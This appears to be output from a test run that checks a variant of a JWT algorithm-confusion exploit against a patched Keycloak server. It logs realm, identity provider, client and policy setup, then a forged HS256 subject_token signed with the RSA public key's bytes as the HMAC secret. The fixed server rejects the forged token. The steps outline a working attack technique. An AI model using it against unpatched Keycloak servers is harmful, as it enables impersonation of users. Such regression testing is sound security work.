=== Variant exploit against fixed Keycloak (keycloak-fixed-variant) === Admin token obtained. Create realm: 201 RSA key pair generated. DER bytes: 294 Create oidc IdP (hardcoded key): 201 Create federated user: 201 Create te-client: 201 Enable IdP mgmt permissions: 200 {"enabled":true,"resource":"b673ddc1-1318-4c83-821b-a7b23cfc0436","scopePermissions":{"token-exchange":"101042a5-ba55-49b5-bd72-617bc38c374b"}} Create client policy: 201 policy_id=cfb09165-783f-450f-832f-169846cba84d Bind policy to token-exchange permission: 201 Forged HS256 subject_token header: {"alg":"HS256","typ":"JWT"} Forged HS256 subject_token payload: {"iss": "https://external-idp-issuer", "sub": "basic-user-id", "aud": "https://external-idp-issuer", "typ": "Bearer", "exp": 1783267521, "iat": 1783267221, "jti": "2ea8590a-8342-432b-b45d-3701d88cfa36"} HMAC secret = RSA public key DER bytes (294 bytes) Submitting external token exchange with forged HS256 subject_token... Response status: 400 Response body: {"error": "invalid_token", "error_description": "invalid token"} fixed: forged HS256 subject_token REJECTED. Error: invalid_token, Description: invalid token